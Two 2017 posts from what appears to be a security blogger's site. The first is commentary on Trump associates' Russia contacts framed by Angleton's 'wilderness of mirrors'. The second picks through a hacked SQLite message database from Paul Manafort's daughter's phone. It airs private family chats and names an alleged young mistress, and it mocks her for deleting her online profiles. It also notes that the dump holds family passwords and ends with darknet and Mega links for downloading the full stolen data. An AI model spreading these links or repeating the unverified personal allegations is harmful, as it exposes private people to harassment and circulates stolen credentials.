When Angleton made the comment on the wilderness of mirrors he was referring to his own deep paranoia and the nature of counter intel. You have spies upon spies that you must determine who they work for in reality. As the chief of counter intelligence it was Angleton’s job to assume that assets and agents within his own organization were in fact double agents or even triple agents. It was Angleton’s job to seek the truth of what his officers were telling him from intelligence reports and what their assets were saying in a time when the great game was at it’s highest point with the USSR. In essence, and this was his personality anyway, he had to assume at all times there was compromise within his organization and to determine who those assets that were doubles were and were working for in reality.

Now, in the current situation we are going through with 45 and the Russian efforts to destabilize the United States there is no internal mole hunt that we have heard about within the halls of the CIA but, there is a counter intelligence operation going on at least at the FBI concerning all the players we are hearing about in the news and likely other names we have not heard. The current players you know are;

  • Paul Manafort (Worked for Yanukovich/Had affairs/Money troubles/Access to slush funds)
  • Trump (No tax retturns/business with Russia/Love of Putin)
  • Jeff Sessions (Lied about meeting Russian Ambassador twice at least)
  • Michael Flynn (Lied about talking to Russian ambassador to Pence and everyone else)
  • Carter Page (Business with Russia and seems disposed to them)
  • Jared Kushner (Revelations of meeting with Russian ambassador with Sessions)
  • Roger Stone (May have handed over DNC emails to Wikileaks physically)
  • Un-named others TBD

There are likely more to be named as we go along but you get the gist. The people in the inner circle of the current presidents campaign and those he then added to his administration all seem to have had regular contact with the Russian government pre election and post. Not only are they talking to Russian emissaries but according to the IC, they are talking to Russian intelligence officers. This is not a good thing even if they were unwitting assets of the Russian intelligence apparatus. To lie about these contacts only makes the problem worse for the state and places more suspicion on them all, which leads to the wilderness of mirrors that the fourth estate is amplifying with the reporting (which they should be doing) on the leaks that are coming out of the IC. Leaks mind you to my mind, are a means to an end to get the word out because if they did not, the admin would attempt to bury them forever. To wit, we have agents of foreign powers and people within the admin who are all lying about their connections and discussions. This is a counter intelligence operation and a mole hunt potentially. Do we believe the people who have been sources of the Steele notes? Or do we think that maybe they are telling tales to muddy the waters even more? Since some of these people seem to be dying conveniently are they being killed off by Putin for talking and telling the truth or are they just being killed to muddy the waters some more?

This is how you have to approach this. No one is telling the truth and you have to discern what the truth of it all really is. Who do you believe?

We are in the wilderness of mirrors kids. Look at the news and try to parse out what is truth and what is fiction. It makes it even worse when there are factions out there like Alex Jones and the SVR that would like you to believe wild stories and disinformation campaigns set out to further their own agendas. All of this then, in a completely inconceivable twist today is re-tweeted by the president of this country who often does so as a diversion (one hopes) or actually believes these things (much worse for he may be mentally deranged) which unbalances us all. We are now all in Angleton’s shoes trying to determine what is truth today and this is one of the most destabilizing things happening today to the United States populace and government. I want you all to understand this as you watch or read the news with these revelations. Specifically now that we have reached peak crazy with Trump saying that the former President ordered a FISA warrant on himself and the campaign in 2016. There are many issues here to consider and if in fact the IC had intel that the candidate and his minions were in fact in touch with Russian intelligence ‘constantly’ then what actions would the IC and the president have at their command to take up to determine if this was in fact true?

The recent accusation by the current president may be complete lunacy and the product of his own reading or watching conspiracy sites, or, it may have some basis in fact. In that there may not have been a FISA warrant but instead foreign friendly intelligence agencies, monitoring not only Russia but by their outside mandate, the current president and his people’s conversations “might” have some telling information. Maybe they in fact got the conversations and there was no smoking gun but instead the conversations looked suspect and more digging was required. Perhaps then, some group like the FIVE EYES passed along this information and it is still being worked by the IC here in the US?

‘Wilderness of Mirrors” kids.

Ponder that.

K.

Written by Krypt3ia

2017/03/06 at 13:48

Kompromat

with 8 comments

screenshot-from-2017-03-03-07-09-21

I feel dirty…

Why?

Because I have been going through the messages from Paul Manafort’s daughters iPhone sql light that’s why. I feel dirty more so because there are revelations in there that, if true, could be evidence of potential kompromat on Manafort while he was working in Ukraine. The Sql database as far as I can tell is real and in fact Manafort himself confirmed to Politico that his daughters phone was hacked on the record so there is that. The question then becomes did someone tamper or create this sql db? In looking at this so far, I cannot say that I think it was created whole cloth or that it has been edited in a way to add these allegations but I have only done a cursory forensic look at it. What I ended up doing was looking more closely at the chats since Politico went on record after they lifted things from this blog. Yesterday I went through all the back and forth and found many a salacious thing. Cutting to the chase though, I found conversations between Manaforts daughter and someone about how her father was having an affair with a girl younger than one of his daughters.

screenshot-from-2017-03-04-03-20-44

What is even more interesting is that the allegation here is that not only was Manafort having this affair but that girl (who is named in the chats and I have backstopped and was in fact in Ukraine at the time mentioned while Manafort was there) but that of all things Paul seems to have said that she was some “Russian friends” daughter. Though the text below states they don’t really think that the girl is Russian there are more down stream that talk about her father and her family and ties to Russia (maybe) but the sick burn here is if she is, well, that is a pretty direct tie to the country that might, ya know, use that as kompromat on Pauly eh?

screenshot-from-2017-03-03-12-05-41

Even the idea that Paul may have had a young trophy mistress is enough for blackmail but the texts go on to describe her travel with him all over the world including to Ukraine while he was working there. So, if the Russians did not have access to her or had placed her in the proximity of Paul this certainly would have been information they would not have passed up on to use. So, once more, if the sql database is legit and the information presented here is on the mark, it is quite possible that Manafort was at least in this instance easily vulnerable to compromise by the Russians.

screenshot-from-2017-03-03-08-16-42

As the chats went on though, it seems that the new girl was also straining Manafort’s money because he was being extravagant with her. As you can see from above, he allegedly rented her a house in the Hamptons by his own for a summer and bought a NYC apartment for her to be in. All of this money being spent also as it happens, was concurrent with his daughters wedding coming and Ukraine not paying him for his services. I believe that the timing for this was at the time Yanukovich was about to flee to Russia and those ledgers with the monies supposed to be paid to Manafort were dug up, which in the end he did not get. All of this could lead to further compromise right? What if all the money trouble and girl trouble put Paul in a bind and the Russians said “We have way to make things better! You know this Trump guy right?”

You see where I am going don’t you?

screenshot-from-2017-03-03-11-40-37

The above text was mentioned in the politico story but here is the raw text. So if this is all true it seems to me that it and much more (allegations of sex things that I will not talk about) in my book would be quite enough to land one in the dossier like that one Steele put together on Trump. All of it, all the sordid details would be things that the SVR/GRU would LOVE to know about and leverage wouldn’t you say? But wait it gets better! It seems that Paul took a page from The Patreus playbook and tried the old “draft email” technique popular with television terrorists!

screenshot-from-2017-03-03-11-48-04

This evidently was working for him until the daughter saw it on his phone. She mentioned a sketchy email and that kinda jives with that email server and domain I found before huh? Maybe that server is how they are communicating? I would love to see what is in that email server, I wonder who else he has been emailing on there? Anyway, there is a lot more in the db that is pretty damning as well as all kinds of personal info like passwords to systems, wireless AP’s and other things owned and operated by the Manafort daughter and immediate family. There is also quite a bit of mentions about Trump and how, even at one point it seems that Manafort was messing about with porn on a Trump laptop or some such thing. I leave all the really dirty things to Politico and any other media source that has the wherewithal to locate the sql dump and open it.

As for me, I have a copy and those law enforcement types who want it can ask if they have the interest. I have tried to get the Anon’s who posted the db to give me more but I am thinking that their statement (see top of page) was an allusion to all the dirt in that sql light db… Which politico, if they ever really got the db, which I doubt now, would have been ravening over to publish.

Stupid fucks.

L8r

K.

EDIT:

I just wanted to cover the idea that this is maybe disinfo and thus placed out there for people to find and publish to muddy the waters. While that is possible, and we are dealing with possible nation state actors, in looking at the db and the contents I lean towards this being real data. The chats are very fluid and read properly, not as if just some anon has put this together inside of the db. The facts on backstopping the names and dates and locations have also checked out so I think it is legit. Added to the fact that Manafort copped to the hack being real adds to the credibility of the data.

That being said… You never know so I thought I would make that caveat. Anything is possible with a nation state player. It is now the job of the news orgs and the LE set to look into this and to determine if the data is true as well as if this possible could have been part of the picture where Manafort and the Russia connections to Trump and his campaign may have their intersection.

UPDATE: 3/7/17

The young woman asserted to be the mistress in this morass has deleted her profiles online as of today. I have not released her name so someone must have called her from a news service. Someone else obviously learned how to open the SQL light database. Sorry miss, but the internet does not forget so your stuff will be out there in cache in perpetuity.

UPDATE: 3/11/17

CNN has finally published something on the dump but they ONLY went after the weakest bit of data in there. A comment by his daughter is just that, a comment  but they went with that when they could have gone with the provable facts that he has/had a mistress in Andriana and that he bought her a place in NYC as well as spent lavishly on her. All this while he was not getting paid by Ukraine and then making odd loans.

What I was getting at all along was that this is all provable information, I backstopped it and now the mistress has deleted her online profiles! Come on CNN stop being pussies!

http://www.cnn.com/2017/03/10/politics/ukraine-manafort-hacked-texts/index.html

So, I have decided to dump the dump for you all to look at. Go. Download. Research.

http://264nglqbtqlabsxl.onion/manafort-clan-secrets-revealed-pt-1-sql-sms-etc/
<--darknet site dump

Links to clearnet download of data

https://mega.nz/#!vhdEGKKC!scYBsRyrPy1-8nDB8_f4Ij5sS8OMhWMLSWJdUtHuSCA

https://mega.nz/#!D1M1HJQK!Oc2pF0lJ2usBBy0IkujE5EHqU6UhBQ5mHttURvxJqYw

 

Written by Krypt3ia

2017/03/04 at 09:29

Posted in Manafort